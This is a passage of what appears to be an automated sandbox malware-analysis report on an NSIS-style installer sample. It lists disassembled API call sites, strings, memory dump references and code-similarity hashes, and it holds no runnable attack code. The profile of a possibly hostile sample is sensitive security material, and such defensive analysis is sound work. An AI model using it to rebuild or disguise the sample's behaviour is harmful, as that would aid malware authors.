                                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 2531174081-0
                                                                                                              • Opcode ID: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                              • Instruction ID: bea5982b108369c56cf3d35f12f42b62494ffc2cb206b3c5387e037ca996873b
                                                                                                              • Opcode Fuzzy Hash: 183bef7a41385e3ccd61e2bddc5e3e752014e2c91baf1b93c875fecc4eda2183
                                                                                                              • Instruction Fuzzy Hash: B2219D71900518BBCB119FA5DD849DFBFB8EF45354F14807AF944B6290C7794A50CFA8
                                                                                                              APIs
                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A99
                                                                                                              • GetMessagePos.USER32 ref: 00404AA1
                                                                                                              • ScreenToClient.USER32(?,?), ref: 00404ABB
                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ACD
                                                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AF3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                              • Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
                                                                                                              • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                              • Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                              • MulDiv.KERNEL32(000740BA,00000064,000740BE), ref: 00402D4D
                                                                                                              • wsprintfW.USER32 ref: 00402D5D
                                                                                                              • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                              • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                              Strings
                                                                                                              • verifying installer: %d%%, xrefs: 00402D57
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-82062127
                                                                                                              • Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                              • Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
                                                                                                              • Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
                                                                                                              • Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58
                                                                                                              APIs
                                                                                                              • GetDC.USER32(?), ref: 00401D59
                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                              • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                              • String ID: Calibri
                                                                                                              • API String ID: 3808545654-1409258342
                                                                                                              • Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                              • Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
                                                                                                              • Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
                                                                                                              • Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE
                                                                                                              APIs
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                                • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                              • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 4216380887-0
                                                                                                              • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                              • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                              • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                              • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                              • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1780285237-0
                                                                                                              • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                              • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                              • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                              • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                              APIs
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                              • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 2667972263-0
                                                                                                              • Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                              • Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
                                                                                                              • Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
                                                                                                              • Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                              • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWidelstrlen
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsn582.tmp$C:\Users\user\AppData\Local\Temp\nsn582.tmp\System.dll
                                                                                                              • API String ID: 3109718747-785379101
                                                                                                              • Opcode ID: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                              • Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
                                                                                                              • Opcode Fuzzy Hash: 3d2fa72be5f195c02a17edb7a7abc67028f461df84df2576b51681d351cbf091
                                                                                                              • Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeGlobal
                                                                                                              • String ID:
                                                                                                              • API String ID: 2979337801-0
                                                                                                              • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                              • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                              • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                              • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Close$DeleteEnumOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1912718029-0
                                                                                                              • Opcode ID: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                              • Instruction ID: 923876515d334741f157c0c1a16b9ae25b0374e488e2a62f99a19aca1c1d50f8
                                                                                                              • Opcode Fuzzy Hash: 9537b7928c54e317f26638c763091e9991b3818ca9768273474462c6ff6c3974
                                                                                                              • Instruction Fuzzy Hash: 4B116A71504119BFEF10AF90DF8CEAE7B79FB54384B10003AF905A11A0D7B49E55AA28
                                                                                                              APIs
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                              • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 1148316912-0
                                                                                                              • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                              • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                              • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                              • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                              • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                              • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                              • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 1849352358-0
                                                                                                              • Opcode ID: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                              • Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
                                                                                                              • Opcode Fuzzy Hash: 8e0fabd36c2f6d3e7eeae66a254b8168ed1f2a4b1cc3225a820133a00fa4cc9f
                                                                                                              • Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38
                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
                                                                                                              • wsprintfW.USER32 ref: 00404A1A
                                                                                                              • SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                              • String ID: %u.%u%s%s
                                                                                                              • API String ID: 3540041739-3551169577
                                                                                                              • Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                              • Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
                                                                                                              • Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
                                                                                                              • Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8
                                                                                                              APIs
                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Timeout
                                                                                                              • String ID: !
                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                              • Opcode ID: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                              • Instruction ID: e3aefc4fd96fc6be6e01b9b250019d2d880820bae5141952ee5ed295407643d5
                                                                                                              • Opcode Fuzzy Hash: bb3cfb28f78b001f2c6e024d0600213de5f72616f9f3d873aed837dd9dfd9417
                                                                                                              • Instruction Fuzzy Hash: DA219071940209BEEF01AFB4CE4AABE7B75EB44344F10403EF601B61D1D6B89A409B68
                                                                                                              APIs
                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F4C
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F6D
                                                                                                              • RegCloseKey.ADVAPI32(?,?,00406195,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F90
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
